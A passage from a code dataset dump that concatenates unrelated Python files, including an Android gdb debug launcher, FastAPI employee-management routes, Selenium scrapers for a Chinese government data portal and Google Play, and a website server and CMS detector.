gdb pretty printer not found at: %s\" % args.pypr_dir)\n\n # default to directory of the program\n if \"ANDROID_BUILD_TOP\" in os.environ:\n sysroot = os.path.join(os.environ[\"OUT\"], \"symbols\")\n src_search_path = os.environ[\"ANDROID_BUILD_TOP\"]\n\n system_lib_dir = os.path.join(sysroot, \"system\", \"lib64\")\n vendor_lib_dir = os.path.join(sysroot, \"vendor\", \"lib64\")\n\n solib_search_path = []\n system_lib_subdirs = [\"\", \"hw\", \"drm\", \"soundfx\"]\n vendor_lib_subdirs = [\"\", \"hw\", \"egl\", \"mediadrm\"]\n if args.sopaths is None:\n solib_search_path += [os.path.join(system_lib_dir, x) for x in system_lib_subdirs]\n solib_search_path += [os.path.join(vendor_lib_dir, x) for x in vendor_lib_subdirs]\n solib_search_path = \":\".join(solib_search_path)\n else:\n solib_search_path = args.sopaths\n else:\n sysroot = os.path.dirname(args.program)\n sysroot = sysroot.replace(\"\\\\\", \"/\")\n if not sysroot:\n sysroot = \".\"\n solib_search_path = args.sopaths\n src_search_path = None\n\n # upload some system library files from device to host.\n #\n # Note the linker64 is required for GDB to debug shared libraries.\n #\n # The other library files are nice to have as they contain symbol table (not debug info) that\n # make stepping into a function in the libraries (e.g. printf() in libc) a better experience.\n # Without the files, say, libc.so, user can step into printf() but\n # 1. user will get no calling stack and\n # 2. user cannot step further (with \"step-mode\" off in GDB) or can step further but cannot step\n # out (with \"step-mode\" on in GDB) due to lack of calling stack. The only good choice for user to\n # get out of woods is to \"continue\".\n #\n # On the other hand we don't want to upload many shared libraries as\n # 1. that would slow down debugger start,\n # 2. 
Many libraries should not be uploaded to host for security reasons.\n #\n # So this file list is to-be-determined.\n # TODO: Maybe we want to get the file list from a file ?\n #\n files = [\"/system/bin/linker64\",\n \"/system/lib64/libc.so\"]\n\n for file in files:\n download_file(args, file, sysroot, pkg_name)\n\n # Generate the gdb command file\n command_file = generate_gdb_command_file(args, sysroot, solib_search_path, src_search_path)\n\n if not args.setup_only:\n # Start gdb.\n gdb_flags = []\n if args.tui:\n gdb_flags.append(\"--tui\")\n\n gdb_path = os.path.join(gdb_bin_path(), \"gdb\")\n gdb_path = os.path.realpath(gdb_path) # canonicalize, for neatness\n try:\n start_gdb(gdb_path, mldb.quote_path_if_needed(args.program), command_file, gdb_flags, no_console=args.no_console)\n finally:\n if not args.attach:\n # gdb does not kill the launched target as we attached gdbserver to an separately started process\n # Hence ensuring that the application is terminated.\n _terminate_application(device, pkg_name, args.component)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jfwallin/magicClassroom","sub_path":"common/mlsdk/v0.24.1/tools/debug/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":20893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5455662905","text":"# -*- coding: UTF-8\n#\n# tip_sched\n# *********\n#\n# Tip creation is an asyncronous operation, here implemented\n\nfrom globaleaks.utils import log\nfrom globaleaks.jobs.base import GLJob\nfrom datetime import datetime\nfrom twisted.internet.defer import inlineCallbacks\nfrom globaleaks.models.internaltip import InternalTip\nfrom globaleaks.models.externaltip import ReceiverTip, Comment\n\n__all__ = ['APSTip']\n\nclass APSTip(GLJob):\n\n @inlineCallbacks\n def operation(self):\n \"\"\"\n Goal of this function is to check all the InternalTip\n and create the Tips for the receiver needing.\n\n Create the ReceiverTip only, because WhistleBlowerTip is\n created when submission is finalized, along with the receipt\n exchange.\n\n Only the Receiver marked as first tier receiver has a Tip now,\n the receiver marked as tier 2 (if configured in the context)\n had their Tip only when the escalation_threshold has reached \n the requested value.\n \"\"\"\n log.debug(\"[D]\", self.__class__, 'operation', datetime.today().ctime())\n\n internaltip_iface = InternalTip()\n receivertip_iface = ReceiverTip()\n\n internal_id_list = yield internaltip_iface.get_newly_generated()\n\n if len(internal_id_list):\n log.debug(\"TipSched: found %d new Tip: %s\" % (len(internal_id_list), str(internal_id_list)))\n\n for id in internal_id_list:\n yield receivertip_iface.create_receiver_tips(id, 1)\n yield internaltip_iface.flip_mark(id, u'first')\n\n # loops over the InternalTip and checks the escalation threshold\n # It may require the creation of second-step Tips\n escalated_id_list = yield internaltip_iface.get_newly_escalated()\n\n if len(escalated_id_list):\n log.debug(\"TipSched: %d Tip are escalated: %s\" % (len(escalated_id_list), str(escalated_id_list)))\n\n # This event would be notified as system Comment\n comment_iface = Comment()\n\n for id in escalated_id_list:\n # yield comment_iface.add_comment(id, u\"Escalation threshold has been reached\", u'system')\n yield receivertip_iface.create_receiver_tips(id, 2)\n yield internaltip_iface.flip_mark(id, 
u'second')\n","repo_name":"Afridocs/GLBackend","sub_path":"globaleaks/jobs/tip_sched.py","file_name":"tip_sched.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"27272238203","text":"#Metadata values, this allows me to share the script if needed.\n\nno_value = \"no_value\"\n\ncommunity_analysis_to_keep_list = [\"all\"]\n\ncontrol_regions = [\"Blanks\", \"Positives\", \"Gblocks\", \"NTCs\", \"Unknowns\", \"TR\"]\n\nbatch_num_dict = { \"Run_1\":\"25-01-19\",\n \"Run_2\":\"15-01-19\",\n \"Run_3\":\"18-01-19\",\n \"Run_4\":\"21-01-19\",\n \"Run_5\":\"18-01-19\"\n }\n\n","repo_name":"Micro-Biology/biosys_py","sub_path":"example_metadata.py","file_name":"example_metadata.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"35348487073","text":"from fastapi.responses import JSONResponse\n# from fastapi import APIRouter, Depends, HTTPException\nfrom starlette.status import HTTP_400_BAD_REQUEST\n\nfrom fastapi import APIRouter, Body, Depends, HTTPException, status, Request, Response, Header\nfrom fastapi.encoders import jsonable_encoder\nfrom typing import List\n# from app.core.utilscm import authrequire\n# from app.core.utilscm.authrequire import get_current_user\n# from app.callcache import dict_cache\nfrom app.models import common\nfrom app.models.category import employee, employeedb, managerdb, userInformationdb, userInformation, gatheringPointdb, \\\n transactionPointdb\n\nrouter = APIRouter()\n# security = HTTPBasic()\n\n\n@router.post(\"/insert\")\n# @authrequire.check_roles_required(roles_required=[\"admin\"])\nasync def insedrt(\n body: employee.employeeInsmodel = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n # current_user: dict = Depends(get_current_user),request : Request = None\n):\n # wrong_get_error = HTTPException(\n # status_code=HTTP_400_BAD_REQUEST,\n # detail=strings.INCORRECT_INPUT,\n # )\n try:\n encoded_body = jsonable_encoder(body)\n if encoded_body.get('type') == 'transaction' and \\\n 'transaction-point-manager' != common.getRoleFromToken(validate_token):\n raise Exception(\"Not authenticated\")\n resp = employee.signUp(encoded_body, employeedb, managerdb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\" : str(e)})\n\n\n\n@router.post(\"/delete\")\n# @authrequire.check_roles_required(roles_required=[\"admin\"])\nasync def insedrt(\n body: employee.employeeDel = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n # current_user: dict = Depends(get_current_user),request : Request = None\n):\n # wrong_get_error = HTTPException(\n # status_code=HTTP_400_BAD_REQUEST,\n # detail=strings.INCORRECT_INPUT,\n # )\n try:\n encoded_body = jsonable_encoder(body)\n authorUser = common.getUserInfoByToken(validate_token, userInformationdb)\n try:\n employeeDeleled = list(employeedb.getModel().find({'username': encoded_body.get('username')}))[0]\n except:\n raise Exception('data not found')\n if authorUser[\"role\"] not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n if employeeDeleled['managedBy'] != authorUser['username'] and 
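All handlers in this router share the Body(..., embed=True) plus Header token shape; a self-contained sketch of just that pattern (the model and the token check are placeholders, not the app's real ones):

from fastapi import APIRouter, Body, Header
from fastapi.encoders import jsonable_encoder
from fastapi.responses import JSONResponse
from pydantic import BaseModel

router = APIRouter()

class EmployeeIn(BaseModel):  # placeholder for employee.employeeInsmodel
    username: str
    type: str

@router.post("/echo")
async def echo(body: EmployeeIn = Body(..., embed=True),
               validate_token: str = Header("")):
    # embed=True makes clients wrap the payload: {"body": {"username": ..., "type": ...}}
    if not validate_token:
        return JSONResponse(status_code=401, content={"message": "missing token"})
    return JSONResponse(status_code=200, content={"echo": jsonable_encoder(body)})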
authorUser[\"role\"] != 'director':\n raise Exception('No authorization')\n userInformation.companyMemberDeleteAccount(encoded_body.get('username'), 'transaction-point-employee', managerdb, employeedb)\n employeedb.getModel().delete_one({'username': encoded_body.get('username')})\n return JSONResponse(status_code=status.HTTP_200_OK, content={ 'deleted': encoded_body.get('username')})\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\" : str(e)})\n\n\n@router.get(\"/get\")\nasync def get():\n try:\n resp = list(employeedb.getModel().find())\n return JSONResponse(status_code=200,content=resp)\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\" : str(e)})\n\n@router.post(\"/get-employee-by-point\")\nasync def insedrt(\n body: employee.employeePointGetListModel = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n):\n try:\n encoded_body = jsonable_encoder(body)\n role = common.getRoleFromToken(validate_token)\n\n if role not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n type = encoded_body.get('type')\n pointId = encoded_body.get('pointId')\n pagesize = encoded_body.get('pagesize')\n pageindex = encoded_body.get('pageindex')\n\n if role != 'director':\n authUser = common.getUserInfoByToken(validate_token, userInformationdb)\n try:\n thisManager = list(managerdb.getModel().find({\"username\": authUser[\"username\"]}))[0]\n except:\n raise Exception('manager not found')\n if thisManager['type'] != type or thisManager[\"pointManaged\"] != pointId:\n raise Exception('No authorization')\n\n resp = employee.getListEmployeeByPoint(type, pointId, pagesize, pageindex, employeedb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\": str(e)})\n\n\n@router.post(\"/get-employee-by-manager\")\nasync def insedrt(\n body: employee.employeeManagerGetListModel = Body(..., embed=True),\n validate_token: str = Header(\"\")\n):\n try:\n encoded_body = jsonable_encoder(body)\n role = common.getRoleFromToken(validate_token)\n\n if role not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n type = encoded_body.get('type')\n managerId = encoded_body.get('managerId')\n pagesize = encoded_body.get('pagesize')\n pageindex = encoded_body.get('pageindex')\n\n if role != 'director':\n authUser = common.getUserInfoByToken(validate_token, userInformationdb)\n try:\n thisManager = list(managerdb.getModel().find({\"username\": authUser[\"username\"]}))[0]\n except:\n raise Exception('manager not found')\n if thisManager['type'] != type or authUser[\"username\"] != managerId:\n raise Exception('No authorization')\n\n resp = employee.getListEmployeeByManager(type, managerId, pagesize, pageindex, employeedb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400, content={\"message\": str(e)})\n\n@router.post(\"/change-employee-point\")\nasync def insedrt(\n body: employee.changePoint = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n):\n try:\n encoded_body = jsonable_encoder(body)\n role = common.getRoleFromToken(validate_token)\n\n if role not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n\n type = encoded_body.get('type')\n newPointId = encoded_body.get('newPointId')\n employeeId = 
encoded_body.get('employeeId')\n if not common.checkPointExist(newPointId, type, gatheringPointdb, transactionPointdb):\n raise Exception('Data not found')\n if role != 'director':\n raise Exception('No authorization')\n\n resp = employee.changePointEmployee(type, employeeId, newPointId, employeedb, gatheringPointdb, transactionPointdb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\": str(e)})\n\n","repo_name":"quangngoc21020550/MagicPostBackend","sub_path":"app/api/routes/category/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17074410544","text":"# -*- coding:utf-8 -*-\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\nimport json\nimport os\nimport time\nimport logging\nimport inspect\nfrom logging.handlers import RotatingFileHandler\n\n\ndir = os.path.dirname(os.path.dirname(__file__))\nhandlers = {\n logging.INFO: os.path.join(dir, 'log\\\\anhui_info.log'),\n logging.ERROR: os.path.join(dir, 'log\\\\anhui_error.log')\n }\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/70.0.3538.110 Safari/537.36'}\n\nclass TNLog(object):\n\n def printfNow(self):\n return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n\n def __init__(self, level=logging.NOTSET):\n self.__loggers = {}\n logLevels = handlers.keys()\n for level in logLevels:\n logger = logging.getLogger(str(level))\n logger.addHandler(handlers[level])\n logger.setLevel(level)\n self.__loggers.update({level: logger})\n\n def getLogMessage(self, level, message):\n frame, filename, lineNo, functionName, code, unknowField = inspect.stack()[2]\n '''日志格式:[时间] [类型] [记录代码] 信息'''\n return \"[%s] [%s] [%s - %s - %s] %s\" % (self.printfNow(), level, filename, lineNo, functionName, message)\n\n def info(self, message):\n message = self.getLogMessage(\"info\", message)\n self.__loggers[logging.INFO].info(message)\n\n def error(self, message):\n message = self.getLogMessage(\"error\", message)\n self.__loggers[logging.ERROR].error(message)\n\ndef createHandlers():\n logLevels = handlers.keys()\n\n for level in logLevels:\n path = os.path.abspath(handlers[level])\n handlers[level] = RotatingFileHandler(path, maxBytes=10000, backupCount=2, encoding='utf-8')\n\ndef anhui(url_path,save_path):\n logger.info('开始爬取安徽政务数据平台')\n url = url_path\n driver = webdriver.Chrome()\n driver.get(url)\n page=4\n login = input('按任意键继续') #登录、切换数据目录(和dataArea对应),分资源页爬取\n\n jsontemp=[]\n for i in range(1,page+1):\n logger.info('page'+str(i))\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n data = soup.find_all('div', attrs={'class': \"dataresources\"})\n data = str(data)\n partern_name = re.compile(r'target=\"_blank\" title=\"(.*?)\\n', re.S)\n name = re.findall(partern_name, data)\n partern_topic = re.compile(r'<span class=\"n3\">数据领域: (.*?) 
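The list endpoints above accept pagesize/pageindex parameters; the usual skip/limit arithmetic behind such parameters, sketched against a pymongo-style cursor like the find() calls above (a 1-based page index is an assumption here):

def paginate(cursor, pageindex: int, pagesize: int):
    # 1-based page index assumed; clamp bad input rather than raising.
    pageindex = max(1, int(pageindex))
    pagesize = max(1, int(pagesize))
    return list(cursor.skip((pageindex - 1) * pagesize).limit(pagesize))

# e.g. page2 = paginate(employeedb.getModel().find({'type': 'transaction'}), 2, 20)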
def anhui(url_path, save_path):\n    logger.info('Start crawling the Anhui government data platform')\n    url = url_path\n    driver = webdriver.Chrome()\n    driver.get(url)\n    page = 4\n    input('Press any key to continue')  # log in and switch to the data catalog (matches dataArea), then crawl the listing pages\n\n    jsontemp = []\n    for i in range(1, page + 1):\n        logger.info('page' + str(i))\n        html = driver.page_source\n        soup = BeautifulSoup(html, 'html.parser')\n        data = soup.find_all('div', attrs={'class': \"dataresources\"})\n        data = str(data)\n        partern_name = re.compile(r'target=\"_blank\" title=\"(.*?)\\n', re.S)\n        name = re.findall(partern_name, data)\n        partern_topic = re.compile(r'<span class=\"n3\">数据领域: (.*?) </span>', re.S)\n        topic = re.findall(partern_topic, data)\n        partern_desc = re.compile(r'<span class=\"zy\" title=\"(.*?)\">资源摘要', re.S)\n        desc = re.findall(partern_desc, data)\n        partern_time = re.compile(r'<span class=\"n1\">更新时间:(.*?)</span>', re.S)\n        time_gx = re.findall(partern_time, data)\n        print(name)\n        logger.info(name)\n        for index in range(len(name)):\n            temp = dict()\n            temp['name'] = name[index]\n            temp['topic'] = topic[index]\n            temp['info'] = dict()\n            temp['info']['desc'] = desc[index]\n            temp['info']['time'] = time_gx[index]\n            logger.info(temp)\n            if name[index] not in jsontemp:\n                jsontemp.append(name[index])\n                json_str = json.dumps(temp, ensure_ascii=False)\n                with open(save_path, 'a', encoding='utf-8') as f:\n                    f.write(json_str)\n                    f.write('\\n')\n        partern_id = re.compile(r'<a class=\"title\" href=\"/site/tpl/90\\?resourceId=(.*?)&', re.S)\n        id = re.findall(partern_id, data)\n        childrenurl = []\n        urlroot1 = 'http://www.mas.gov.cn/site/tpl/90?resourceId='\n        urlroot2 = '&p_isPage=1&p_pageSize=8&p_pageIndex=1&p_dataArea=2&p_providerOrgan=&p_dateFormat=yyyy-MM-dd&p_length=34&p_orderBy='\n        for num in range(len(id)):\n            childrenurl.append(urlroot1 + id[num] + urlroot2)\n        for index, childurl in enumerate(childrenurl):  # detail pages holding a single dataset were clicked through by hand\n            driver.execute_script(\"window.open('{}')\".format(childurl))  # open the detail page in a new tab\n            driver.switch_to.window(driver.window_handles[-1])  # switch to the new tab\n            time.sleep(2)\n            if i >= 1:\n                try:\n                    driver.find_element_by_xpath(\"//*[text()='下载']\").click()  # click the download button\n                    time.sleep(5)\n                    try:\n                        download = '.csv'\n                        driver.find_element_by_partial_link_text(download).click()  # download the csv file\n                        time.sleep(5)\n                    except Exception:\n                        logger.error('no csv link')\n                    try:\n                        download = '.xls'\n                        driver.find_element_by_partial_link_text(download).click()  # download the xls file\n                        time.sleep(5)\n                    except Exception:\n                        logger.error('no xls link')\n                    try:\n                        download = '.json'\n                        driver.find_element_by_partial_link_text(download).click()  # download the json file\n                        time.sleep(5)\n                    except Exception:\n                        logger.error('no json link')\n                except Exception:\n                    logger.error('no downloadable file')\n\n            driver.close()  # close the detail tab\n            driver.switch_to.window(driver.window_handles[0])  # switch back to the listing page\n            time.sleep(2)\n        try:\n            driver.find_element_by_xpath(\"//*[text()='下一页']\").click()  # '下一页' means 'next page'\n            time.sleep(10)\n        except Exception:\n            driver.find_element_by_xpath(\"//*[text()='下一页']\").click()\n            time.sleep(10)\n\nif __name__ == '__main__':\n    createHandlers()\n    logger = TNLog()\n    url_path = 'http://www.mas.gov.cn/site/tpl/72'\n    save_path = '../info/anhui.json'\n    anhui(url_path, save_path)\n\n\n\n","repo_name":"Gyhfresh/web-crawler-master","sub_path":"platform/anhui.py","file_name":"anhui.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26524272837","text":"import ujson as json\nfrom django.conf import settings\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET\n\nfrom blueapps.account.decorators import login_exempt\nfrom gcloud import err_code\nfrom gcloud.analysis_statistics.models import TaskflowExecutedNodeStatistics\nfrom gcloud.apigw.decorators import mark_request_whether_is_trust, return_json_response\nfrom gcloud.apigw.decorators import project_inject\nfrom gcloud.core.apis.drf.serilaziers import NodeExecutionRecordResponseSerializer\nfrom gcloud.taskflow3.models import TaskFlowInstance\nfrom gcloud.iam_auth.intercept import iam_intercept\nfrom gcloud.iam_auth.view_interceptors.apigw import TaskViewInterceptor\nfrom apigw_manager.apigw.decorators import apigw_require\n\n\n
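# Decorators below apply bottom-up: IAM interception and project injection run\n# inside the apigw / login / csrf wrappers.\n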
@login_exempt\n@csrf_exempt\n@require_GET\n@apigw_require\n@return_json_response\n@mark_request_whether_is_trust\n@project_inject\n@iam_intercept(TaskViewInterceptor())\ndef get_task_node_data(request, task_id, project_id):\n    project = request.project\n    task = TaskFlowInstance.objects.get(id=task_id, project_id=project.id)\n\n    node_id = request.GET.get(\"node_id\")\n    component_code = request.GET.get(\"component_code\")\n    loop = request.GET.get(\"loop\")\n    template_node_id = request.GET.get(\"template_node_id\")\n\n    try:\n        subprocess_stack = json.loads(request.GET.get(\"subprocess_stack\", \"[]\"))\n    except Exception:\n        return {\n            \"result\": False,\n            \"message\": \"subprocess_stack is not a valid array json\",\n            \"code\": err_code.REQUEST_PARAM_INVALID.code,\n        }\n\n    data = task.get_node_data(node_id, request.user.username, component_code, subprocess_stack, loop)\n\n    if data[\"result\"] and template_node_id:\n        execution_time_data = (\n            TaskflowExecutedNodeStatistics.objects.filter(\n                template_node_id=template_node_id, status=True, is_skip=False, task_template_id=task.template_id\n            )\n            .order_by(\"-archived_time\")\n            .values(\"archived_time\", \"elapsed_time\")\n        )[: settings.MAX_RECORDED_NODE_EXECUTION_TIMES]\n        serializer = NodeExecutionRecordResponseSerializer(data={\"execution_time\": execution_time_data})\n        serializer.is_valid()\n        data[\"data\"].update(serializer.validated_data)\n\n    return {\n        \"result\": data[\"result\"],\n        \"data\": data[\"data\"],\n        \"message\": data[\"message\"],\n        \"code\": err_code.SUCCESS.code if data[\"result\"] else err_code.UNKNOWN_ERROR.code,\n    }\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/apigw/views/get_task_node_data.py","file_name":"get_task_node_data.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"11960863012","text":"import os\r\nimport requests\r\n\r\nfrom modules.module_cmsWordPress import cmsWordPress\r\nfrom modules.module_cmsDrupal import cmsDrupal\r\nfrom modules.module_cmsJoomla import cmsJoomla\r\nfrom modules.module_savingData import savingData\r\n\r\n#########################################################################\r\n\r\nclass mainManager:\r\n\r\n    # ***************************************************************\r\n    def __init__(self, params):\r\n        self.params = params\r\n        self.status = self.main(self.params)\r\n\r\n    # ***************************************************************\r\n    def main(self, userSelect):\r\n\r\n        pathToFile = userSelect[\"pathToFile\"]\r\n        pathToSave = userSelect[\"pathToSave\"]\r\n        extension = userSelect[\"extension\"]\r\n        genLogs = userSelect[\"genLogs\"]\r\n\r\n        fullPath = \"\"\r\n        if genLogs:\r\n            fileName = \"Logs.txt\"\r\n            fullPath = os.path.join(pathToSave, fileName)\r\n            file_listLogs = open(fullPath, \"w\")\r\n            file_listLogs.close()\r\n\r\n        finalData = {}\r\n        file_listSites = open(pathToFile, \"r\")\r\n\r\n        for url in file_listSites:\r\n            url = url.strip()\r\n            if not url:\r\n                continue  # skip blank lines; url[-1] would raise IndexError on them\r\n            if url.endswith(\"/\"):\r\n                url = url[:-1]\r\n            print(url)\r\n\r\n            secretInfo = self.gettingInfo(url)\r\n            if fullPath != \"\":\r\n                message = \"* \" + url + \" :\\n\"\r\n\r\n                if \"Error connection\" not in secretInfo:\r\n                    message += \">>> Identification of Server : \"\r\n                    message += \"success\\n\" if \"not available\"\\\r\n                        not in secretInfo[\"Server\"] else \"error\\n\"\r\n                    message += \">>> Identification of CMS : \"\r\n                    message += \"success\\n\" if \"not defined\"\\\r\n                        not in secretInfo[\"CMS\"] else \"error\\n\"\r\n\r\n
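                # gettingInfo could not reach the site; secretInfo is its error string\r\n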
\"error\\n\"\r\n\r\n else:\r\n message += \"error connection\\n\"\r\n\r\n file_listLogs = open(fullPath, \"a\")\r\n file_listLogs.write(message + \"#\"*50 + \"\\n\")\r\n file_listLogs.close()\r\n\r\n print(secretInfo)\r\n print(\"#\" * 50)\r\n finalData.update({url: secretInfo})\r\n file_listSites.close()\r\n\r\n ############################################################\r\n magic = savingData(finalData, pathToSave, extension).status\r\n ############################################################\r\n\r\n return magic\r\n\r\n # ***************************************************************\r\n def gettingInfo(self, urlAddress):\r\n\r\n if \"http\" not in urlAddress:\r\n urlAddress = \"http://\" + urlAddress\r\n\r\n result = {}\r\n try:\r\n data = requests.get(urlAddress)\r\n except:\r\n return \"Error connection to '{}'\".format(urlAddress)\r\n\r\n primaryInfo = data.headers\r\n if \"server\" in primaryInfo.keys() and primaryInfo[\"server\"]!=\"\":\r\n serverInfo = primaryInfo[\"server\"]\r\n else:\r\n serverInfo = \"Server info is not available\"\r\n result.update({ \"Server\": serverInfo })\r\n\r\n cmsInfo = \"\"\r\n if cmsWordPress(urlAddress).status == True:\r\n cmsInfo += \"WordPress\"\r\n elif cmsDrupal(urlAddress).status == True:\r\n cmsInfo += \"Drupal\"\r\n elif cmsJoomla(urlAddress).status == True:\r\n cmsInfo += \"Joomla\"\r\n else:\r\n cmsInfo += \"CMS is not defined\"\r\n result.update({ \"CMS\": cmsInfo })\r\n\r\n return result\r\n\r\n#########################################################################\r\n\r\nif __name__ == \"__main__\":\r\n testParams = {\r\n 'pathToFile': 'D:\\\\test_siteList.txt',\r\n 'pathToSave': 'D:\\\\test_saveDir',\r\n 'extension': 'txt',\r\n 'genLogs': True\r\n }\r\n status = mainManager(testParams).status\r\n print(\"#\"*50)\r\n if status == True:\r\n print(\"Information about sites is stored\")\r\n else:\r\n print(\"Error when saving data\")\r\n\r\n#========================================================================\r\n","repo_name":"vdenisov-python/desktop-cms-detector","sub_path":"appManager.py","file_name":"appManager.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34557185809","text":"# -*- coding: utf-8 -*-\n#-------------------------------------------------------------------------------------#\n# Name: crawl.py #\n# Description: an efficient multi-process web crawler that automatically scrapes #\n# app info from Google Play #\n#-------------------------------------------------------------------------------------#\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport multiprocessing as mp\nimport json\nimport csv\nimport time\nimport argparse\nfrom queue import Full, Empty\n\nCATEGORIES = ['Action', 'Adventure', 'Arcade', 'Board', 'Card',\n 'Casino', 'Casual', 'Educational', 'Music', 'Puzzle',\n 'Racing', 'Role_Playing', 'Simulation', 'Sports',\n 'Strategy', 'Trivia', 'Word']\n\nCHROME_PATH = 'Z:/chromedriver.exe'\n\nSTART_PACKAGES = [\n 'com.orangeapps.piratetreasure',\n 'se.hellothere.gravityhd',\n 'com.makingfun.mageandminions',\n 'com.gameloft.android.ANMP.Gloft5DHM',\n 'com.Zeeppo.GuitarBand',\n]\n\nXPATHS = {\n 'general': {\n 'Category': \"//a[@itemprop='genre']\",\n 'Name': \"//h1[@itemprop = 'name']/span\",\n 'Price': \"//button[@aria-label and span[span]]\",\n 
XPATHS = {\n    'general': {\n        'Category': \"//a[@itemprop='genre']\",\n        'Name': \"//h1[@itemprop = 'name']/span\",\n        'Price': \"//button[@aria-label and span[span]]\",\n        'Updated': \"//div[div='Updated']/span/div/span\",\n        'Size': \"//div[div='Size']/span/div/span\",\n        'Installs': \"//div[div='Installs']/span/div/span\",\n        'Requires_Android': \"//div[div='Requires Android']/span/div/span\",\n        'Age': \"//div[div='Content Rating']/span/div/span/div\",\n        'Inapp_Products': \"//div[div='In-app Products']/span/div/span\",\n        'Developer': \"//div[div='Offered By']/span/div/span\",\n        'Description': \"//content/div[@jsname='sngebd']\",\n        'Rating': \"//div[@class='BHMmbe']\",\n        'Rating_Total': \"//span[@aria-label]\",\n        'Content_Feature': \"//div[div='Content Rating']/span/div/span/div[2]\",\n        'Version': \"//div[div='Current Version']/span/div/span\",\n    },\n    'rating': {\n        'Rating_5': \"//div[span = '5']/span[@title]\",\n        'Rating_4': \"//div[span = '4']/span[@title]\",\n        'Rating_3': \"//div[span = '3']/span[@title]\",\n        'Rating_2': \"//div[span = '2']/span[@title]\",\n        'Rating_1': \"//div[span = '1']/span[@title]\",\n    },\n    # 'permission': {\n    #     'button': \"//div[div = 'Permissions']/span/div/span/div/a\",\n    #     'each_item': \"//li[@class = 'NLTG4']/span\",\n    # },\n}\n\nHEADERS = {\n    'full': ['Category', 'Package', 'Name', 'Updated', 'Size',\n             'Installs', 'Requires_Android', 'Age', 'Developer', 'Rating',\n             'Rating_Total', 'Rating_5', 'Rating_4', 'Rating_3', 'Rating_2',\n             'Rating_1', 'Price', 'Description',\n             'Content_Feature', 'Permission', 'Inapp_Products', 'Version'],\n    'trivial': ['Inapp_Products', 'Permission'],\n}\n\n\nclass Crawler:\n    \"\"\"\n    A web crawler object that can fetch app pages from Google Play and parse them\n    into an app info dict.\n\n    Parameters\n    ----------\n    driver: Selenium.webdriver.Chrome object\n        a selenium webdriver object utilized to control the browser\n    \"\"\"\n\n    def __init__(self, driver):\n        self.driver = driver\n        time.sleep(5)\n\n    def get_page_by_package(self, package):\n        \"\"\"\n        Given an Android package name, fetch the app info page from Google Play.\n\n        Returns: None\n        \"\"\"\n        self.driver.get(\n            'https://play.google.com/store/apps/details?id=' + package)\n        time.sleep(1)\n\n    def parse_current_page(self):\n        \"\"\"\n        Parse the current page into a python dict based on the key-xpath pairs in\n        variable XPATHS.\n\n        Returns: dict{str: str, ... , str: str}\n        \"\"\"\n        parsed_dic = {}\n        for key, xpath in XPATHS['general'].items():\n            try:\n                parsed_dic[key] = self.driver.find_element_by_xpath(xpath).text\n            except Exception:\n                pass\n        for key, xpath in XPATHS['rating'].items():\n            try:\n                parsed_dic[key] = self.driver.find_element_by_xpath(\n                    xpath).get_attribute('title')\n            except Exception:\n                pass\n        return parsed_dic\n\n
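    # A parsed page looks roughly like this (values illustrative only; absent\n    # elements are simply skipped, so keys may be missing):\n    #   {'Category': 'Arcade', 'Name': 'Some Game', 'Rating': '4.3',\n    #    'Installs': '1,000,000+', 'Rating_5': '12,345', ...}\n\n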
